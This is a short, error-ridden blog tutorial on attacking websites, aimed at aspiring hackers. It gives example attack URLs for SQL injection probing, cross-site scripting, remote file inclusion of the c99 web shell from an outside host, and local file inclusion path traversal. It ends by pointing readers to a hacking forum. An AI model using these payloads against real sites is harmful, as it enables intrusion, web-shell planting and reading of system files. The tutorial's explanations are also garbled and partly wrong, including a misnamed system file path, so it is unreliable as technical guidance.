This tutorial was made by Hini Aes, dedecatied to Soumyodeep on facebook.
Introduction:
All computer networks are not 100% secure peroid, but some networks are secure enough from an hacker firstly my topic is about hacking websites so first you want to know what is an exploit in my terms so you will under stand.
Exploit: The weak section of an website. With an exploit you can hack any computer system with exploit sometimes an exploit might seem to be limited, but it can be your adventage of something else maybe but html trojan/or virus.
Terms:
Deface: to replace code or file of the orginal index page.
SQL Injection/SQLi: en.wikipedia.org/wiki/SQL_injection
XSS: en.wikipedia.org/wiki/Cross-site_scripting
LFI/RFI: http://www.scribd.com/doc/6498408/Remote-and-Local-File-Inclusion-Explained
SQL Injection Example:
www.sql.com/index.php?id=1'
if you get in error in the browser let "error in your MySQL syntax"
so by putting ' after a .php?value=# and you get error.
then site if vulerable to an SQL Injection.
XSS (Cross Site Scripting):
www.xsssite.com/search.php?query=<h1>this site is vulnerable to xss </h1>
Remote & Local File Inclusion.
RFI Exploit.
www.northkoreans.com/index.php?include=http://www.haxorz.com/c99.txt
by using the parametor include=(http://www.haxorz.com/c99.txt
the page file include c99.txt from haxorz.com but if you use .php shell then it will appear on the haxorz.com but its in .txt form then it will load contents from northkoreans.com.
LFI
www.lfime.com/index.php?id=../../../../../../etc/pwd
you have to search about that sorry.
register on www.hackforums.net and read tutorials and do them then you will be come an website hacker.
No comments:
Post a Comment